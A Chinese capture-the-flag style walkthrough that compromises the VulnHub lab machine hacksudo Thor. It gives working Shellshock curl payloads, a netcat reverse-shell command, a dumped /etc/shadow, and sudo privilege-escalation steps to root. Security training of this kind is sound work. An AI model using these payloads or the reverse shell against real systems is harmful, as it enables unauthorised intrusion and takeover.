靶机练习: hacksudo---Thor
靶机地址: http://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
MD5 校验:d1216820513fd7f96bca40c1459861c2
SHA1 检验:70b7fb9a523ba559d3437cd1f0ae7f1cdbd77578
- cmd 进行校验:
certutil -hashfile 文件路径 EncryptionType
- powershell 进行校验:
Get-FileHash 文件路径 -Algorithm EncryptionType | Format-List
- EncryptionType 是加密类型:SHA1, MD5
- cmd 进行校验:
使用 VirtualBox
网络 Host-Only
- kali: NAT + [ Bridged/Host-Only ]
- arp-scan
- nmap
- netdiscover
- fping
初步扫描 sudo arp-scan -l -I eth1
┌──(kali㉿kali)-[~] └─$ sudo arp-scan -l -I eth1 [sudo] kali 的密码: Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 0a:00:27:00:00:0d (Unknown: locally administered) 08:00:27:bf:0e:ee PCS Systemtechnik GmbH 08:00:27:56:af:01 PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.8: 256 hosts scanned in 2.182 seconds (117.32 hosts/sec). 3 responded
使用 nmap 对发现 IP 进行端口扫描 nmap -A -T4
┌──(kali㉿kali)-[~] └─$ nmap -A -T4 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 20:35 CST Nmap scan report for Host is up (0.0011s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA) | 256 349a57607d6670d5b5ff4796e0362375 (ECDSA) |_ 256 ae7deefe1dbc994d54453d6116f86c87 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.38 (Debian) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.66 seconds
经典 SSH 服务80/tcp
也是经典 http 服务- 系统上是 Debian
有两段 JavaScript 代码function respFunc() { var x = document.getElementById("theTopNav"); console.log(x); if (x.className === "topnav") { x.className += " responsive"; return 0; } if (x.className === "topnav navbar-fixed") { x.className += " responsive"; return 0; } if (x.className === "topnav responsive") { x.className = "topnav"; return 0; } if (x.className === "topnav navbar-fixed responsive" || x.className === "topnav responsive navbar-fixed") { x.className = "topnav navbar-fixed"; return 0; } } // Function below is jquery-3 function used for making the navbar sticky $(document).ready(function() { $(window).scroll(function () { if ($(window).scrollTop() > 120) { $("#theTopNav").addClass('navbar-fixed'); } if ($(window).scrollTop() < 121) { $("#theTopNav").removeClass('navbar-fixed'); } }); }); var old_time = 0; var count = 1; var eEgg_flag = false; var modal = document.getElementById('eEgg_modal'); var footer = document.getElementById('footer'); function eEgg_func(){ var d = new Date(); var n = d.getTime(); var new_time = Math.ceil(n/1000); if ((new_time - old_time) <= 1) { count++; } else { count = 1; } old_time = new_time; if (count > 7 && !eEgg_flag) { modal.style.display = "block"; eEgg_flag = true; // Timeout setTimeout(function () { modal.style.display = "none"; }, 21000); //Timeout text display in the footer var now = new Date().getTime(); var countDownDate = now + 21000; setInterval(function() { // Get todays date and time var now = new Date().getTime(); // Find the distance between now an the count down date var distance = countDownDate - now; // Time calculations for seconds var seconds = Math.floor((distance % (1000 * 60)) / 1000); // Display the result in the element with id="demo" document.getElementById("footer").innerHTML = "Going back in "+ seconds + "s..."; }, 1000); } } - 对登录界面内容做简单校验的
中有段注释,此页面可以运用了 cgi 技术<!-- cgi-bin ---!> - CGI 是Web 服务器运行时外部程序的规范,按 CGI 编写的程序可以扩展服务器功能
- CGI 应用程序能与浏览器进行交互,还可通过数据库API 与数据库服务器等外部数据源进行通信,从数据库服务器中获取数据
- 应该存在一个
其他的没有什么意义,下一步我们继续目录爆破 dirsearch -u
┌──(kali㉿kali)-[~] └─$ dirsearch -u _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Output File: /home/kali/.dirsearch/reports/ Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_21-02-33.log Target: [21:02:33] Starting: [21:02:36] 403 - 279B - /.ht_wsr.txt ... ... [21:02:38] 403 - 279B - /.php [21:02:46] 200 - 4KB - /README.md [21:03:06] 200 - 1KB - /admin_login.php [21:03:09] 302 - 7KB - /admin_home.php -> home.php [21:03:29] 403 - 279B - /cgi-bin/ [21:03:35] 200 - 4KB - /contact.php [21:03:51] 301 - 316B - /fonts -> [21:03:54] 200 - 472B - /header.php [21:03:56] 200 - 5KB - /home.php [21:03:58] 200 - 4KB - /images/ [21:03:58] 301 - 317B - /images -> [21:04:00] 200 - 5KB - /index.php [21:04:00] 200 - 5KB - /index.php/login/ [21:04:26] 200 - 8KB - /news.php [21:04:59] 403 - 279B - /server-status [21:05:00] 403 - 279B - /server-status/ Task Completed
- 有意思的文件
## Disclaimer <b><i>This project should not be modified in any way and used anywhere else without my permission.</b></i> If you use this project for phishing purposes after modifying the source code / or by any other means, remember that the original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that is not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose. # Online Banking System A web based banking system with all essential features and security accompanied by a beautiful and simple website. The website is designed in accordance with google material design and resposive web design guidelines to ensure a seamless experience between devices. A fictional name of "Dolphin Bank" has been used only for representative purposes. ## Built with <b>HTML5, CSS, JavaScript</b> & <b>jQuery</b> used for front-end design. <b>PHP7 & MySQL</b> used for back-end design. <b>Oracle MySQL</b> has been used to create and host the database for the internet banking website. Other than the languages/tools mentioned above <b>no</b> other/external libraries and/or web-page templates have been used, everything has been coded from ground-up straight from scratch. ## How to build/use Setup an environment which supports web development like <b>LAMP</b> on <b>Linux</b> systems OR install <b>WampServer/XAMPP</b> or anything similar on <b>Windows</b>. Copy the folder [net-banking](https://github.com/zakee94/online-banking-system/tree/master/net-banking) or the files in it to the location of the localhost. For example "/var/www/html", the loaction of localhost in Ubuntu. Import the [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql) database into your MySQL setup. Edit the file [connect.php](https://github.com/zakee94/online-banking-system/blob/master/net-banking/connect.php) and give proper username and password of your MySQL setup. Open a browser and test wether the setup works or not by visiting the home page. Type "localhost/home.php" as the URL in the browser to visit the home page. All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql). However some important usernames and passwords are provided below : * Username of admin is "admin" & password is "password123". * Username of most of the customers is their "first_name" & password is their "first_name" followed by "123". Some useful links to help in proper setup : * [Installing LAMP](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-14-04) * [WampServer](http://www.wampserver.com/en/) * [Importing database in MySQL](https://www.digitalocean.com/community/tutorials/how-to-import-and-export-databases-and-reset-a-root-password-in-mysql) ## Details about the project An exhaustive list of features, documentation, design hierarchy, details about the web pages, database, design characterstics/features and a lot more can be found [here](https://drive.google.com/open?id=1Px2shjcmyLUv7-u5wp93HvKT_zvw-Pmk). The ER Diagram can also be found on the link given above or can be viewed [here](https://drive.google.com/open?id=1Tn2fBR9IjLP8dlv6svrc4aEvryrYcI3G). ## Description of the various folders - <b>/net-banking :</b> Contains the source code of the website - <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website - <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website ## Screenshots (more can be found [here](https://drive.google.com/open?id=1bLLNyEiVGoWgHDfOehGooYSAZUNtj85F))   ## Authors * [zakee94](https://github.com/zakee94/)
使用技术 HTML5、CSS、JavaScript、jQuery、PHP7、MySQL、Oracle MySQL
这个重要文件存在All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql] However some important usernames and passwords are provided below : * Username of admin is "admin" & password is "password123". * Username of most of the customers is their "first_name" & password is their "first_name" followed by "123". -
发现此应用没有限制Index of
## Description of the various folders - <b>/net-banking :</b> Contains the source code of the website - <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website - <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website -
- net-banking 目录
- net_banking.sql 数据库到 MySQL 设置中,管理员和客户的所有密码和用户名都可以在数据库中找到
- connect.php
- 账号密码信息
其中在 /admin_login.php
存在明显 sql 注入漏洞http://
直接四个账号信息,也有明显 sql 注入漏洞- 结合
中 sql 格式攻击更佳,但目前不需要我们已经是管理员,下面就是片段net_banking.sql
INSERT INTO `customer` VALUES (1,'Nafees','Zakee','male','1994-11-28',123456789,'zakee.nafees@gmail.com','+91 8918722499','22/10, Secondary Road, Durgapur - 713204','delhi',1122334455,1234,'zakee94','nafees123'), (2,'Md Salman','Ali','male','1994-10-11',987654321,'ali.salman@gmail.com','+966 895432167','Al Ahsa Street Malaz, King Abdulaziz Rd, Alamal Dist. RIYADH 12643-2121.','riyadh',1133557788,1234,'salman','salman123'), (3,'Tushar','Kr. Pandey','male','1995-02-03',125656765,'tusharpkt@gmail.com','+334 123456987','Champ de Mars, \r\n5 Avenue Anatole France, \r\n75007 Paris, France','paris',1122338457,1357,'tushar','tushar123'), (4,'Jon','Snow','male','1985-02-03',129156787,'jon.snow@gmail.com','+1 8918332797','The Night Watch,\r\nKing in the North,\r\nThe North Remembers,\r\nWesteros.','newyork',1233556739,1234,'jon','snow123');
下一步,我们回到 /cgi-bin/
进行爆破,使用 dirsearch -u -f -e cgi,sh
┌──(kali㉿kali)-[~] └─$ dirsearch -u -f -e cgi,sh _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 16514 Output File: /home/kali/.dirsearch/reports/ Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_22-05-06.log Target: [22:05:07] Starting: [22:05:11] 403 - 279B - /cgi-bin/.ht_wsr.txt [22:05:11] 403 - 279B - /cgi-bin/.htaccess.bak1 [22:05:11] 403 - 279B - /cgi-bin/.htaccess.save [22:05:11] 403 - 279B - /cgi-bin/.htaccess.orig [22:05:11] 403 - 279B - /cgi-bin/.htaccess.sample [22:05:11] 403 - 279B - /cgi-bin/.htpasswds [22:05:11] 403 - 279B - /cgi-bin/.htaccess_extra [22:05:11] 403 - 279B - /cgi-bin/.htaccessOLD2 [22:05:11] 403 - 279B - /cgi-bin/.htpasswd_test [22:05:11] 403 - 279B - /cgi-bin/.htaccess_sc [22:05:11] 403 - 279B - /cgi-bin/.htaccessOLD [22:05:11] 403 - 279B - /cgi-bin/.html [22:05:11] 403 - 279B - /cgi-bin/.htaccessBAK [22:05:11] 403 - 279B - /cgi-bin/.httr-oauth [22:05:11] 403 - 279B - /cgi-bin/.htaccess_orig [22:05:11] 403 - 279B - /cgi-bin/.htm [22:05:14] 403 - 279B - /cgi-bin/.php [22:06:32] 500 - 612B - /cgi-bin/backup.cgi [22:08:56] 500 - 612B - /cgi-bin/shell.sh Task Completed
我们使用 nmap 进行验证我们的想法 nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls
┌──(kali㉿kali)-[~] └─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 1 ⨯ Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 22:15 CST Nmap scan report for Host is up (0.00090s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-shellshock: | VULNERABLE: | HTTP Shellshock vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-6271 | This web application might be affected by the vulnerability known | as Shellshock. It seems the server is executing commands injected | via malicious HTTP headers. | | Disclosure date: 2014-09-24 | Exploit results: | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | <html><head> | <title>500 Internal Server Error</title> | </head><body> | <h1>Internal Server Error</h1> | <p>The server encountered an internal error or | misconfiguration and was unable to complete | your request.</p> | <p>Please contact the server administrator at | webmaster@localhost to inform them of the time this error occurred, | and the actions you performed just before this error.</p> | <p>More information about this error may be available | in the server error log.</p> | <hr> | <address>Apache/2.4.38 (Debian) Server at Port 80</address> | </body></html> | | References: | http://www.openwall.com/lists/oss-security/2014/09/24/10 | http://seclists.org/oss-sec/2014/q3/685 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 |_http-server-header: Apache/2.4.38 (Debian) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds
- shellshock 漏洞的存在是可以肯定
- 测试
也同样存在 - 在上面利用方法也给出
我们使用 curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"
┌──(kali㉿kali)-[~] └─$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" /usr/bin/nc
- 雀实存在
先开启 nc -nvlp 4444
使用 curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 4444'"
┌──(kali㉿kali)-[~] └─$ nc -nvlp 4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [] 33482 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
升级 shell 使用 python3 -c 'import pty;pty.spawn("/bin/bash")'
首先检测 sudo 配置 sudo -l
bash-4.3$ sudo -l sudo -l Matching Defaults entries for www-data on HackSudoThor: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on HackSudoThor: (thor) NOPASSWD: /home/thor/./hammer.sh
- 我们可以无条件执行
参数 /home/thor/./hammer.sh
bash-4.3$ sudo -u thor /home/thor/./hammer.sh sudo -u thor /home/thor/./hammer.sh HELLO want to talk to Thor? Enter Thor Secret Key :
- 需要输入
bash-4.3$ sudo -u thor /home/thor/./hammer.sh sudo -u thor /home/thor/./hammer.sh HELLO want to talk to Thor? Enter Thor Secret Key : id id Hey Dear ! I am id , Please enter your Secret massage : id id uid=1001(thor) gid=1001(thor) groups=1001(thor) Thank you for your precious time! bash-4.3$
- 发现在第二次的输入内容会做为命令执行
- 并且命令以 thor 执行
那么我们执行的 id
换成 bash
即可获得 thor 的 shell
HELLO want to talk to Thor? id bash id uid=1001(thor) gid=1001(thor) groups=1001(thor) python3 -c 'import pty;pty.spawn("/bin/bash")' thor@HacksudoThor:/usr/lib/cgi-bin$
查看 thor 的 sudo 配置
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l sudo -l Matching Defaults entries for thor on HackSudoThor: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User thor may run the following commands on HackSudoThor: (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
- 发现有
/usr/bin/cat, /usr/sbin/service
两个 root 的权限
我们能查看 /etc/shadow
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo cat /etc/shadow sudo cat /etc/shadow root:$6$1YV0h.2rYTAvcB.o$cLPgAevmbnBo8dtADheWYcIfGLg157gfrCzZsKqv268MDkimBW7JcnQK6sI79fXsa1Hm5GmP8Kni05w.2nJfc0:18838:0:99999:7::: daemon:*:18789:0:99999:7::: bin:*:18789:0:99999:7::: sys:*:18789:0:99999:7::: sync:*:18789:0:99999:7::: games:*:18789:0:99999:7::: man:*:18789:0:99999:7::: lp:*:18789:0:99999:7::: mail:*:18789:0:99999:7::: news:*:18789:0:99999:7::: uucp:*:18789:0:99999:7::: proxy:*:18789:0:99999:7::: www-data:*:18789:0:99999:7::: backup:*:18789:0:99999:7::: list:*:18789:0:99999:7::: irc:*:18789:0:99999:7::: gnats:*:18789:0:99999:7::: nobody:*:18789:0:99999:7::: _apt:*:18789:0:99999:7::: systemd-timesync:*:18789:0:99999:7::: systemd-network:*:18789:0:99999:7::: systemd-resolve:*:18789:0:99999:7::: systemd-coredump:!!:18789:::::: messagebus:*:18789:0:99999:7::: sshd:*:18789:0:99999:7::: mysql:!:18790:0:99999:7::: ftpuser:!:18793:0:99999:7::: thor:$6$W4fXVS7OotxxqyVR$VP6iBANtcJIBt5.eI6qHFH1ho.xTtsISGiKj2uRkc.DH1NfPw54FImt28S8rKpn0PhlfHL3VYSAVNmZWws98X1:18838:0:99999:7::: thor@HacksudoThor:/usr/lib/cgi-bin$
- 直接看到 root 密码的加密,我们可以进行破解,但效率比较低
其实 /usr/sbin/service
这个才是致命的,我们使用 sudo service ../../bin/bash
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/bash sudo service ../../bin/bash bash-4.3# id id uid=0(root) gid=0(root) groups=0(root)
到此,便结束了 GAME OVER
